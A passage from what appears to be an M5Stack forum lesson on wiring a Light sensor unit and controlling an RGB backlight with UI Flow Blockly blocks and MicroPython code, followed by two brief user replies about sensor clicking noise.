the supplied cable. The light should fall into the hole with the sensor (figure 5). Figure 5 Let's start! Blockly (UI Flow) First of all, we need to make sure that the UI thread is connected to the M5. If You see the words "Disconneted", then repeatedly press the arrows (1) as long as the label (2) not to be changed to "connected". Great! Blocks Can now be added by clicking on the plus (3) (figure 6). Figure 6 OK, now check the box next to the light (1), then click OK (2) (figure 6.1). Figure 6.1 In order to get the digital data from the module you need to add the appropriate puzzle Blockly. Units press (1), then light (2), then transfer the digital value (3) to the puzzle workspace (figure 6.2). Figure 6.2 When the light falls on the sensor, it returns the logical unit on the digital output, in this case - we do not need the backlight and we turn it off, otherwise, on the contrary, we light the backlight. In order to control the heat of the glow, use the a key (colder) and the C key (warmer) (figure 7). Figure 7 The lesson is finished! :) MicroPython (UI Flow) from m5stack import * from m5ui import * import units clear_bg(0x000000) light0 = units.Light(units.PORTB) btnA = M5Button(name="ButtonA", text="ButtonA", visibility=False) btnB = M5Button(name="ButtonB", text="ButtonB", visibility=False) btnC = M5Button(name="ButtonC", text="ButtonC", visibility=False) import random red = None blue = None green = None def buttonA_pressed(): global red, blue, green, rgb, light0 red = red - 25 blue = blue + 25 pass def buttonC_pressed(): global red, blue, green, rgb, light0 red = red + 25 blue = blue - 25 pass buttonA.wasPressed(callback=buttonA_pressed) buttonC.wasPressed(callback=buttonC_pressed) red = 100 green = 100 blue = 100 while True: if red >= 255: red = 255 if red < 0: red = 0 if green >= 255: green = 255 if green < 0: green = 0 if blue >= 255: blue = 255 if blue < 0: blue = 0 if light0.d_read(): rgb.set_all(int('0x%02x%02x%02x' % (round(min(100, max(0, red)) * 2.55), round(min(100, max(0, green)) * 2.55), round(min(100, max(0, blue)) * 2.55)))) else: rgb.set_all(0x000000) lcd.pixel(random.randint(0, 320), random.randint(0, 240), 0xccffff) wait(0.05) wait(0.001) C & C++ (Arduino IDE) Example not yet written ^_^ Downloads Demo Thank you - LastCaress last edited by @dimi I've tried this and it works, but it makes so much noise. Each time it makes a reading (several times every second I guess) it makes an annoying "click" :\ @lastcaress You can to increase a delay interval.
https://forum.m5stack.com/topic/502/lesson-21-1-units-light/2
CC-MAIN-2020-40
refinedweb
667
60.65
From: Eelis van der Weegen (gmane_at_[hidden]) Date: 2005-02-06 23:36:03. Since I don't know the purpose of the clear_dispatch() overload for no_property, I have no idea what the solution should be. I've also attached a simpler testcase. Regards, Eelis #include <algorithm> #include <boost/graph/adjacency_list.hpp> int main () { typedef boost::adjacency_list<boost::vecS, boost::vecS, boost::undirectedS> G; G g (2); add_edge(0, 1, g); G h = g; g = h; assert(num_edges(g) == num_edges(h)); // fails } Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2005/02/79938.php
CC-MAIN-2021-04
refinedweb
104
61.43
Integrating Azure Search with Kentico Bryan Soltis — Jul 9, 2015 azuresearchcustom Microsoft continues to expand its cloud platform with new functionality to meet the growing needs of business. Azure Search is one of the latest offerings that can provide a robust and scalable search option for applications. I wanted to see how well this search feature integrated with Kentico, so I decided to develop a prototype using this new service. In this blog, I’ll show you how to combine these two great products to provide a powerful search platform to your application. This blog has been updated! Check out the details below. Overview Azure Search is a powerful feature of Microsoft’s cloud platform that provides a scalable, full-text search via a REST API. This functionality abstracts the search processing from your application and offloads it to the cloud, with all communication done via the API. The data for the index is provided by the client and stored in Azure, where Microsoft indexes and searches against it. Unlike traditional “fetch” services that access your data externally, Azure Search requires that developers upload their data to Azure to store in the cloud. One of the best parts of the service is the ability to leverage machine-learning for better results. Using cloud-based resources, Azure Search allows for filtering, sorting, scoring, and support for fifty different languages. Through highlighting and faceting, results can be customized to display the exact information the user is searching for in a clean, logical format. You can find out more about Azure Search here: In this blog, I will be leveraging this API to build a custom search component to my site using an Azure Search Service. I will show you how to create an index, upload data to it, and then perform search functions against it. In the end, I will have a completely abstracted search feature for my application, hosted in the cloud. Setting up the service The first step of the process is to create my Azure Search Service. This is a simple process that involves a few clicks within the Azure Management Portal to get running. You can find tutorials for this process here: Azure Search is currently divided into two pricing tiers. I have chosen the Free pricing tier as this is a demo site. For a production site with more than 10,000 documents, you will need to choose the Standard pricing, which will allocate specific resources for your search and offer additional scaling capabilities. Creating my web part For my example, I made a single web part that will handle all of my integration. In this control, I will allow the user to create an index, load the index with data, and search against it. All of the processes will be manual and allow me to view each result as they occur. Note This implementation, as you can imagine, isn’t exactly a real-world solution but rather a quick POC for testing purposes. At the end of the article, I will detail the areas a full-scale solution should contain. I start with a basic web part and add a few properties. These properties will be related to my Azure Search Service and allow me to configure a different service and index for each implementation of the web part. #region "Public properties" /// <summary> /// Gets or sets azure search service name /// </summary> public string AzureSearchServiceName { get { return ValidationHelper.GetString(GetValue("AzureSearchServiceName"), ""); } set { SetValue("AzureSearchServiceName", value); } } /// <summary> /// Gets or sets azure search service key /// </summary> public string AzureSearchServiceKey { get { return ValidationHelper.GetString(GetValue("AzureSearchServiceKey"), ""); } set { SetValue("AzureSearchServiceKey", value); } } /// <summary> /// Gets or sets azure search service key /// </summary> public string AzureSearchServiceIndexName { get { return ValidationHelper.GetString(GetValue("AzureSearchServiceIndexName"), ""); } set { SetValue("AzureSearchServiceIndexName", value); } } #endregion For the design, I have added some basic controls to allow the user to perform the actions and see the results. <h2>Azure Search</h2> <asp:UpdateProgress <ProgressTemplate> Working.... </ProgressTemplate> </asp:UpdateProgress> <asp:UpdatePanel <ContentTemplate> <h3>Index Actions</h3> <asp:Button <asp:Button <h3>Search</h3> <asp:TextBox</asp:TextBox> <br /> <br /> <asp:Button <asp:Button <br /> <br /> <asp:Label</asp:Label> </ContentTemplate> </asp:UpdatePanel> One last setup piece was to create a helper class to store my Azure calls. This made things much cleaner and easier to manage. public class AzureSearchHelper { public const string" + doc.NodeAliasPath + "</a><br /><br />"); } } else { sb.Append("You must enter atleast 3 characters."); } } catch(Exception ex) { sb.Append(ex.Message); } return sb.ToString(); } Much like the creation and loading of the index, the search API is a very dynamic piece of code and can accept several parameters that affect the results. Notice that, in my example, I am performing a “suggest” call (noted in the Uri). This code will find all of the records that start with the entered value and return them. The Suggest functionality is nice for finding things like the search term but does require at least three characters to be entered.); There are several ways to execute the search query, each with different capabilities and results. You can find more about the available API calls here: Testing it out Now that I have my functionality in place, it’s time to see if it actually works! The first step will need to be adding the web part to my site and setting the Azure Search Service properties. Web Part Properties Web Part Display Next, I will view the page and create my index. I will verify the index is created in my Azure Search service. Create Index 1 Create Index 2 After creating the index, it’s time to load the data. Load Index 1 Load Index 2 With the index data loaded, I can now perform searches against the data. Search Index 1 Search Index 2 Moving Forward I wrote this blog to show you some possibilities with integrating Azure Search into your Kentico sites. Due to the complexities of building a robust search solution, I opted for a simple implementation with some basic functionality. If I were to build a full solution, I would probably develop the following: Create a custom module for managing the indexes within my Kentico site Add a UI to allow the user to define the page types to index Add a UI to allow the user to define the page type fields to index Add a UI to allow the user to define how each file would be indexed/configured Add functionality to keep the index up to date as data changes within the site (Global event handler, Scheduled task, etc.) Enhance the web part to allow the user to specify their search criteria Enhance the web part to allow the user to define a transformation for the results As you can see, a full implementation would be a daunting task, but one that may prove worth it for certain projects. Search can be a very resource-intensive process and impede a site’s ability to stand up to traffic. Integrating with a 3rd party service like Azure Search may alleviate these issues by offloading this processing to the cloud. Additionally, a cloud-based solution would allow for scalability and growth as needs change within the application. UPDATE I aded some new functionality to the web part to enable type-ahead suggestions. It's not the most elegant implementation (a classy AJAX postback), but you should see the concept in action. Basically, as you type in the Search Box, it will look at the QuoteAuthor field and return any matching values. Clicking on the suggestion will post back the value and return the results. You can download the updated version below. Conclusion I really enjoyed working on this blog and seeing how it can be used with Kentico. Because both Kentico and Azure are so extendable, the integration proved to be pretty easy and definitely achievable for most developers. I’d be interested to know your thoughts and experiences with Azure Search. And here’s the web part code and helper class code. Download Azure Search Source Code This blog is intended to demonstrate one of many ways to accomplish this task. Always consult the Kentico Documentation for best practices and additional examples. juan_alchourron-ssss.gouv.qc commented on Nov 3, 2015 Great post, thanks Bryan ! rhutnyk commented on Jul 17, 2015 Bryan, Thank for sharing this!
https://devnet.kentico.com/articles/integrating-azure-search-with-kentico
CC-MAIN-2019-18
refinedweb
1,387
52.6
/* Source: Vulnerabilities summary The following advisory describes a use-after-free vulnerability found in Linux Kernel’s implementation of AF_PACKET that can lead to privilege escalation. AF_PACKET sockets “allow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher levels protocol headers” Credit The vulnerability was discovered by an independent security researcher which reported this vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor response “It is quite likely that this is already fixed by: packet: hold bind lock when rebinding to fanout hook – Also relevant, but not yet merged is packet: in packet_do_bind, test fanout with bind_lock held – We verified that this does not trigger on v4.14-rc2, but does trigger when reverting that first mentioned commit (008ba2a13f2d).” Vulnerabilities details This use-after-free is due to a race condition between fanout_add (from setsockopt) and bind on a AF_PACKET socket. The race will cause __unregister_prot_hook() from packet_do_bind() to set po->running to 0 even though a packet_fanout has been created from fanout_add(). This allows us to bypass the check in unregister_prot_hook() from packet_release() effectively causing the packet_fanout to be released and still being referenced from the packet_type linked list. Crash Proof of Concept */ // Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel. // the kernel config is provided too. #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <pthread.h> #include <sys/utsname.h> #include <sched.h> #include <stdarg.h> #include <stdbool.h> #include <sys/stat.h> #include <fcntl.h> #define IS_ERR(c, s) { if (c) perror(s); } struct sockaddr_ll { unsigned short sll_family; short sll_protocol; // big endian int sll_ifindex; unsigned short sll_hatype; unsigned char sll_pkttype; unsigned char sll_halen; unsigned char sll_addr[8]; }; static int fd; static struct ifreq ifr; static struct sockaddr_ll addr; void *task1(void *unused) { int fanout_val = 0x3; // need race: check on po->running // also must be 1st or link wont register int err = setsockopt(fd, 0x107, 18, &fanout_val, sizeof(fanout_val)); // IS_ERR(err == -1, "setsockopt"); } void *task2(void *unused) { int err = bind(fd, (struct sockaddr *)&addr, sizeof(addr)); // IS_ERR(err == -1, "bind"); } void loop_race() { int err, index; while(1) { fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); IS_ERR(fd == -1, "socket"); strcpy((char *)&ifr.ifr_name, "lo"); err = ioctl(fd, SIOCGIFINDEX, &ifr); IS_ERR(err == -1, "ioctl SIOCGIFINDEX"); index = ifr.ifr_ifindex; err = ioctl(fd, SIOCGIFFLAGS, &ifr); IS_ERR(err == -1, "ioctl SIOCGIFFLAGS"); ifr.ifr_flags &= ~(short)IFF_UP; err = ioctl(fd, SIOCSIFFLAGS, &ifr); IS_ERR(err == -1, "ioctl SIOCSIFFLAGS"); addr.sll_family = AF_PACKET; addr.sll_protocol = 0x0; // need something different to rehook && 0 to skip register_prot_hook addr.sll_ifindex = index; pthread_t thread1, thread2; pthread_create (&thread1, NULL, task1, NULL); pthread_create (&thread2, NULL, task2, NULL); pthread_join(thread1, NULL); pthread_join(thread2, NULL); // UAF close(fd); } } static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { close(fd); return false; } close(fd); return true; } void setup_sandbox() { int real_uid = getuid(); int real_gid = getgid(); if (unshare(CLONE_NEWUSER) != 0) { printf("[!] unprivileged user namespaces are not available\n");); } } int main(int argc, char *argv[]) { setup_sandbox(); system("id; capsh --print"); loop_race(); return 0; } /* Crash report [ 73.703931] dev_remove_pack: ffff880067cee280 not found [ 73.717350] ================================================================== [ 73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1/0x1f0 [ 73.729371] Write of size 8 at addr ffff880067d28870 by task poc/1175 [ 73.732594] [ 73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29 [ 73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014 [ 73.746433] Call Trace: [ 73.747985] dump_stack+0x6c/0x9c [ 73.749410] ? dev_add_pack+0x1b1/0x1f0 [ 73.751622] print_address_description+0x73/0x290 [ 73.753646] ? dev_add_pack+0x1b1/0x1f0 [ 73.757343] kasan_report+0x22b/0x340 [ 73.758839] __asan_report_store8_noabort+0x17/0x20 [ 73.760617] dev_add_pack+0x1b1/0x1f0 [ 73.761994] register_prot_hook.part.52+0x90/0xa0 [ 73.763675] packet_create+0x5e3/0x8c0 [ 73.765072] __sock_create+0x1d0/0x440 [ 73.766030] SyS_socket+0xef/0x1b0 [ 73.766891] ? move_addr_to_kernel+0x60/0x60 [ 73.769137] ? exit_to_usermode_loop+0x118/0x150 [ 73.771668] entry_SYSCALL_64_fastpath+0x13/0x94 [ 73.773754] RIP: 0033:0x44d8a7 [ 73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029 [ 73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7 [ 73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011 [ 73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0 [ 73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410 [ 73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000 [ 73.798567] [ 73.799095] Allocated by task 1360: [ 73.800300] save_stack_trace+0x16/0x20 [ 73.802533] save_stack+0x46/0xd0 [ 73.803959] kasan_kmalloc+0xad/0xe0 [ 73.805833] kmem_cache_alloc_trace+0xd7/0x190 [ 73.808233] packet_setsockopt+0x1d29/0x25c0 [ 73.810226] SyS_setsockopt+0x158/0x240 [ 73.811957] entry_SYSCALL_64_fastpath+0x13/0x94 [ 73.814636] [ 73.815367] Freed by task 1175: [ 73.816935] save_stack_trace+0x16/0x20 [ 73.821621] save_stack+0x46/0xd0 [ 73.825576] kasan_slab_free+0x72/0xc0 [ 73.827477] kfree+0x91/0x190 [ 73.828523] packet_release+0x700/0xbd0 [ 73.830162] sock_release+0x8d/0x1d0 [ 73.831612] sock_close+0x16/0x20 [ 73.832906] __fput+0x276/0x6d0 [ 73.834730] ____fput+0x15/0x20 [ 73.835998] task_work_run+0x121/0x190 [ 73.837564] exit_to_usermode_loop+0x131/0x150 [ 73.838709] syscall_return_slowpath+0x15c/0x1a0 [ 73.840403] entry_SYSCALL_64_fastpath+0x92/0x94 [ 73.842343] [ 73.842765] The buggy address belongs to the object at ffff880067d28000 [ 73.842765] which belongs to the cache kmalloc-4096 of size 4096 [ 73.845897] The buggy address is located 2160 bytes inside of [ 73.845897] 4096-byte region [ffff880067d28000, ffff880067d29000) [ 73.851443] The buggy address belongs to the page: [ 73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0 [ 73.861329] flags: 0x100000000008100(slab|head) [ 73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007 [ 73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000 [ 73.870617] page dumped because: kasan: bad access detected [ 73.872456] [ 73.872851] Memory state around the buggy address: [ 73.874057] ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 73.876931] ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 73.878913] >ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 73.880658] ^ [ 73.884772] ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 73.890978] ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 73.897763] ================================================================== We know that the freed object is a kmalloc-4096 object: ``` struct packet_fanout { possible_net_t net; unsigned int num_members; u16 id; u8 type; u8 flags; union { atomic_t rr_cur; struct bpf_prog __rcu *bpf_prog; }; struct list_head list; struct sock *arr[PACKET_FANOUT_MAX]; spinlock_t lock; refcount_t sk_ref; struct packet_type prot_hook ____cacheline_aligned_in_smp; }; ``` and that its prot_hook member is the one being referenced in the packet handler when registered via dev_add_pack() from register_prot_hook() inside af_packet.c: ``` struct packet_type { __be16 type; // This is really htons(ether_type). struct net_device *dev; // NULL is wildcarded here int (*func) (struct sk_buff *, struct net_device *, struct packet_type *, struct net_device *); bool (*id_match)(struct packet_type *ptype, struct sock *sk); void *af_packet_priv; struct list_head list; }; ``` The function pointers inside of struct packet_type, and the fact it is in a big slab (kmalloc-4096) makes heap spraying easier and more reliable as bigger slabs are less often used by the kernel. We can use usual kernel heap spraying to replace the content of the freed packet_fanout object by using for example sendmmsg() or any other mean. Even if the allocation is not permanent, it will still replace the targeted content in packet_fanout (ie. the function pointers) and due to the fact that kmalloc-4096 is very stable, it is very less likely that another allocation will corrupt our payload. id_match() will be called when sending a skb via dev_queue_xmit() which can be reached via a sendmsg on a AF_PACKET socket. It will loop through the list of packet handler calling id_match() if not NULL. Thus, we have a PC control situation. Once we know where the code section of the kernel is, we can pivot the kernel stack into our fake packet_fanout object and ROP. The first argument ptype contains the address of the prot_hook member of our fake object, which allows us to know where to pivot. Once into ROP, we can jump into native_write_c4(x) to disable SMEP/SMAP, and then we could think about jumping back into a userland mmaped executable payload that would call commit_creds(prepare_kernel_cred(0)) to elevate our user process privilege to root. */
https://www.exploit-db.com/exploits/43010/?rss
CC-MAIN-2018-05
refinedweb
1,442
60.41
Region¶ Firefox monitors the users region in order to show relevant local search engines and content. The region is tracked in 2 properties: - Region.current- The most recent location we detected for the user. - Region.home- Where we consider the users home location. These are tracked separately as to avoid updating the users experience repeatedly as they travel for example. In general callers should use Region.home. If the user is detected in a current region that is not there home region for a continuous period (current 2 weeks) then their home region will be updated. Testing¶ To set the users region for testing you can use Region._setHomeRegion("US", false), the second parameter notify will send a notification that the region has changed and trigger a reload of search engines and other content. Updating test_Region_geocoding.js data¶ The test data used in this test is generated by running the MLS geocoding service locally: Follow the Ichnaea location development guide @. Make a list of test locations in a CSV format, for example: 23.7818724,38.0531587 23.7728138,38.0572369 1.6780180,48.5973431 1.7034801,48.5979913 1.6978640,48.5919751 You can use the MLS raw data files to get a large sample @ Save a script to run the geocoding in ichnaea/ichnaea import geocode geocoder = geocode.Geocoder() f = open("mls.csv", "r") r = open("mls-lookup-results.csv", "a") for x in f: [lat, long] = x.strip().split(",") region = geocoder.region(lat, long) r.write("%s\n" % region) Run the script $ make shell $ cd ichnaea $ python run.py If you want to commit the new test data ~500 seems to be a reasonable number of data points to test before running into issues with the test length.
https://firefox-source-docs.mozilla.org/toolkit/modules/toolkit_modules/Region.html
CC-MAIN-2020-50
refinedweb
290
57.98
Simple .rc file loading for your Python projects Project description dotrc Simple .rc file loading for your Python projects. Looks for config files passed via --config as well as typical locations based on your app name: - Files provided via --config option (see below) - .apprc - ~/.config/app Files are loaded such that files earlier in the above list override settings in later ones. The content of each file is parsed as YAML, falling back to JSON if that fails. Usage import dotrc # Loads .apprc, ~/.config/app, etc. config = dotrc.load('app') --config Additional configuration files may be provided via the --config commandline option. This parses sys.argv directly, so load your configs before doing anything that might modify it. Files are loaded in order, so options in later files override options set in earlier ones. $ python app.py --config .extrarc .lastrc $ python app.py --config=.extrarc $ python app.py --config=.1rc --config=.2rc A list of files will be populated from the commandline arguments until a switch or option is detected. You need to be mindful if you for some reason have config files starting with dashes, so you don't signal the end of your file list. $ python app.py --config .1rc --config=--.weirdrc $ python app.py --config=--.1rc --config=--.2rc $ python app.py --config ./-.1rc ./-.2rc Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/dotrc/
CC-MAIN-2019-51
refinedweb
244
67.25
A guide to Ruby’s yield keyword when you’re feeling lost For me, the most confusing part of learning and *actually* comprehending the concept of yield in Ruby is understanding when to use it. Before we go over common use cases of the yield keyword, I’m going to attempt to explain what it is — mostly, as a refresher to myself. Important background: Blocks refer to code that lives between ‘do’ and ‘end’ keywords or curly braces { }, when we’re working with one liners. What does yield do? (Using examples from the Learn.co Yield and Blocks lesson). def yielding puts “the program is executing the code inside the method” yield puts “now we are back in the method” endyielding { puts “the method has yielded to the block!” }WOULD RETURN: the program is executing the code inside the method the method has yielded to the block! now we are back in the method Calling the yield keyword from within a method acts as a pause button that momentarily stops execution of the method you’re in, yielding the right of turn to the block, and returns to the method once the block runs. Yield with parameters Important background: - What is are parameters versus arguments? The term argument is commonly used to refer to variable names incorporated within a method definition and the value that’s passed in within a method call but there’s a distinction. - BUT there’s a distinction to be aware of: Parameter should refer to the variable in a method definition. While the argument is the data you pass into the method’s parameter(s). The utility of yield lies in the ability to tweak a method to serve different purposes without having to rewrite it completely. (Think sandwich code!) Using yield allows you to “inject” an argument into a block. With yield + a parameter, you’re able to pass a value to the block you’re yielding to. Like so: def return_modified(array). #our version of the collect method return_array = [] array.each do |e| return_array << yield(e) end return_array endreturn_modified([1, 2, 3, 4]) do |x| x * x end => [1, 4, 9, 16] We’re yielding to a block from inside another block. Note: This was a supreme point of confusion for me. Because in lessons on Learn.co, we were learning about yield in reference to a block but in labs, we were often writing methods that used yield — without seeing the block. I. did. not. get it. Here was the aha! moment for me: You pass in the block when you call the method. The return value for yield is the return value of the block that you’re yielding to. If the last line of code is simply an integer 8. The return value of yield would be 8. But here it’s [1, 4, 9, 16]. And that’s exactly how the #collect works. We’re yielding element to the block with #each but we’re capturing the return value of that block and returning it. Importance of yield Yield is essential in Ruby because it helps us avoid sandwich code — where the set up is the same, the body is different, and the tear down is different. Yield allows us to inject a value into a block — chunk of code — that helps our method function in a slightly different way. Sources:
https://joannpan.medium.com/a-guide-to-rubys-yield-keyword-when-you-re-feeling-lost-c584bf444211
CC-MAIN-2022-40
refinedweb
562
71.85
I recently moved from Kyoto to Paris to do my second postdoc. In the process of flat hunting in Paris, which has been very hard because of the rising housing cost, I walked around some different parts of Paris. One impression I had is Paris is small. Once you walk through the city, you will find this quite easily. My intuition told me that its size is almost close to the size of Kyoto, which is a medium-sized city in Japan. But, is it true? I found a website comparing London and Paris, and it says London is larger than Paris, but no comparison between Paris and Japanese cities exists. So, I just checked by superimposing maps of the two cities. I used an R package called “ggmap”, a very nice geographic visualization package built based on ggplot2. I first downloaded maps of Paris and Kyoto in 15km squares surrounding city centers. (I chose the Cite island for Paris and Shijo-Karasuma for Kyoto as centers). This process was a bit tricky because maps are defined by longitudinal and latitudinal range. The identical longitudinal ranges do not represent the same distance when the cities’ latitudes are different. I used the “great circule distance” equation to adjust the effect of latitude on the longitudinal distance and and find appropriate ranges. R <- 6371 #convert distance to longitudinal range given a latitude delta.lambda <- function(d, phi=0.0) { 2*asin(sin(d/R/2)/cos(phi)) } #create longitudinal and latitudinal ranges which define a suquare with length d map.range <- function(d, lat=0.0, lon=0.0){ dphi <- d/R*360/2/pi dlambd <- delta.lambda(d, phi=lat*2*pi/360)*360/2/pi lonrange <- lon + c(-dlambd/2, dlambd/2) latrange <- lat + c(-dphi/2, dphi/2) rang <- c(lonrange, latrange) names(rang) <- c("left", "right", "bottom", "top") return (rang) } In the above code, the map.range function returns longitudinal and latitudinal range which covers a square with its side length = d km. Once you can define a range to draw, downloading and plotting maps is simple thanks to ggmap functions. d <-15 #15kmx15km map z <- 12 #Zoom level kyoto_center <- c(35.0, 135.76) kyoto <- map.range(d, lat=kyoto_center[1], lon=kyoto_center[2]) kyoto_map <- get_stamenmap(kyoto, zoom=z, maptype="toner") ggmap(kyoto_map) paris_center <- c(48.855, 2.34) paris <- map.range(d, lat=paris_center[1], lon=paris_center[2]) paris_map <- get_stamenmap(paris, zoom=z, maptype="toner") ggmap(paris_map) The “get_stamenmap” function downloads a map from Stamen Maps. If you like Google map, use “get_googlemap” function to download from Google map. The two maps plotted side by side tells me a lot. For examplem the Peripherique motor way, which defines Paris, looks quite similar size as the city of Kyoto surrounded by mountains. Superimposing two maps was another tricky point. The ggmap has two ways for superimposition of graphics, “inset_map” and “inset_raster”. It seems “inset_raster” is an appropriate function because it allows me to set coordinates for regions you superimpose graphics. One problem is that it does not allow me to change alpha value. I just added alpha values to the raster graphics of the map and plot it using the inset_raster. translucent.raster <- function(map){ tmp <- as.matrix(map) tmp <- gsub("$", "55", tmp) tmp <- gsub("FFFFFF", "0000FF", tmp) ras <- as.raster(tmp) attributes(ras) <- attributes(map) ras } ggmap(paris_map) + inset_raster(translucent.raster(kyoto_map), xmin=paris["left"], ymin=paris["bottom"], xmax=paris["right"], ymax=paris["top"]) This is a bit awkward way, but the result looks OK. Now, I can compare landmarks more precisely. The Golden and Silver temples (indicated by small black arrows), which define north-west and north-east edges of Kyoto area are almost on the Peripherique. This means walking from the Cite island to the Peripherique is just like walking from Shijo-Karasuma to the Silver temple. Probably, this distance similarity made me feel that the two cities are in similar size. Of course, Paris has much larger suburban area, and the size of Paris metropolitan area is much larger than Kyoto. But, my intuition looks more or less correct.
https://tmfujis.wordpress.com/category/programming/
CC-MAIN-2022-33
refinedweb
686
66.54
. Often you want to use your own python code in your Airflow deployment, for example common code, libraries, you might want to generate DAGs using shared python code and have several DAG python files. You can do it in one of those ways: add your modules to one of the folders that Airflow automatically adds to PYTHONPATH add extra folders where you keep your code to PYTHONPATH package your code into a Python package and install it together with Airflow. The next chapter has a general description of how Python loads packages and modules, and dives deeper into the specifics of each of the three possibilities above. How package/modules loading in Python works¶ The list of directories from which Python tries to load the module is given by the variable sys.path. Python really tries to intelligently determine the contents Adding directories to the PYTHONPATH.. Also make sure to Add init file to your folders. Typical structure of packages¶ This is an example structure that you might have in your dags folder: <DIRECTORY ON PYTHONPATH> | .airflowignore -- only needed in ``dags`` folder, see below | -- my_company | __init__.py | common_package | | __init__.py | | common_module.py | | subpackage | | __init__.py | | subpackaged_util_module.py | | my_custom_dags | __init__.py | my_dag1.py | my_dag2.py | base_dag.py In the case above, these are the ways you could import the python files: from my_company.common_package.common_module import SomeClass from my_company.common_package.subpackage.subpackaged_util_module import AnotherClass from my_company.my_custom_dags.base_dag import BaseDag You can see the .airflowignore file at the root of your folder. This is a file that you can put in your dags folder to tell Airflow which files from the folder should be ignored when the Airflow scheduler looks for DAGs. It should contain either regular expressions (the default) or glob expressions for the paths that should be ignored. You do not need to have that file in any other folder in PYTHONPATH (and also you can only keep shared code in the other folders, not the actual DAGs). In the example above the dags are only in my_custom_dags folder, the common_package should not be scanned by scheduler when searching for DAGS, so we should ignore common_package folder. You also want to ignore the base_dag.py if you keep a base DAG there that my_dag1.py and my_dag2.py derives from. Your .airflowignore should look then like this: my_company/common_package/.* my_company/my_custom_dags/base_dag\.py If DAG_IGNORE_FILE_SYNTAX is set to glob, the equivalent .airflowignore file would be: my_company/common_package/ my_company/my_custom_dags/base_dag.py Built-in PYTHONPATH entries in Airflow¶ Airflow, when running dynamically adds three directories to the sys.path: The dagsfolder: It is configured with option dags_folderin section [core]. The configfolder: It is configured by setting AIRFLOW_HOMEvariable ( {AIRFLOW_HOME}/config) by default. The pluginsFolder: It is configured with option plugins_folderin section [core]. Note The DAGS folder in Airflow 2 should not be shared with the webserver. While you can do it, unlike in Airflow 1.10, Airflow has no expectations that the DAGS folder is present in the webserver. In fact it’s a bit of security risk to share the dags folder with the webserver, because it means that people who write DAGS can write code that the webserver will be able to execute (ideally the webserver should never run code which can be modified by users who write DAGs). Therefore if you need to share some code with the webserver, it is highly recommended that you share it via config or plugins folder or via installed Airflow packages (see below). Those folders are usually managed and accessible by different users (Admins/DevOps) than DAG folders (those are usually data-scientists), so they are considered as safe because they are part of configuration of the Airflow installation and controlled by the people managing the installation. Best practices for module loading¶ There are a few gotchas you should be careful about when you import your code. Use unique top package name¶ It is recommended that you always put your dags/common files in a subpackage which is unique to your deployment ( my_company in the example below). It is far too easy to use generic names for the folders that will clash with other packages already present in the system. For example if you create airflow/operators subfolder it will not be accessible because Airflow already has a package named airflow.operators and it will look there when importing from airflow.operators. Don’t use relative imports¶ Never use relative imports (starting with .) that were added in Python 3. This is tempting to do something like that it in my_dag1.py: from .base_dag import BaseDag # NEVER DO THAT!!!! You should import such shared dag using full path (starting from the directory which is added to PYTHONPATH): from my_company.my_custom_dags.base_dag import BaseDag # This is cool The relative imports are counter-intuitive, and depending on how you start your python code, they can behave differently. In Airflow the same DAG file might be parsed in different contexts (by schedulers, by workers or during tests) and in those cases, relative imports might behave differently. Always use full python package paths when you import anything in Airflow DAGs, this will save you a lot of troubles. You can read more about relative import caveats in this Stack Overflow thread. Add __init__.py in package folders¶ When you create folders you should add __init__.py file as empty files in your folders. While in Python 3 there is a concept of implicit namespaces where you do not have to add those files to folder, Airflow expects that the files are added to all packages you added. Inspecting your PYTHONPATH loading configuration¶ Adding directories to the PYTHONPATH] Creating a package in Python¶ This is most organized way of adding your custom code. Thanks to using packages, you might organize your versioning approach, control which versions of the shared code are installed and deploy the code to all your instances and containers in controlled way - all by system admins/DevOps rather than by the DAG writers. It is usually suitable when you have a separate team that manages this shared code, but if you know your python ways you can also distribute your code this way in smaller deployments. You can also install your Plugins and Provider packages as python packages, so learning how to build your package is handy. Here is how to create your package:", packages=setuptools.find_packages(), ).
https://airflow.apache.org/docs/apache-airflow/2.3.1/modules_management.html
CC-MAIN-2022-33
refinedweb
1,062
62.48
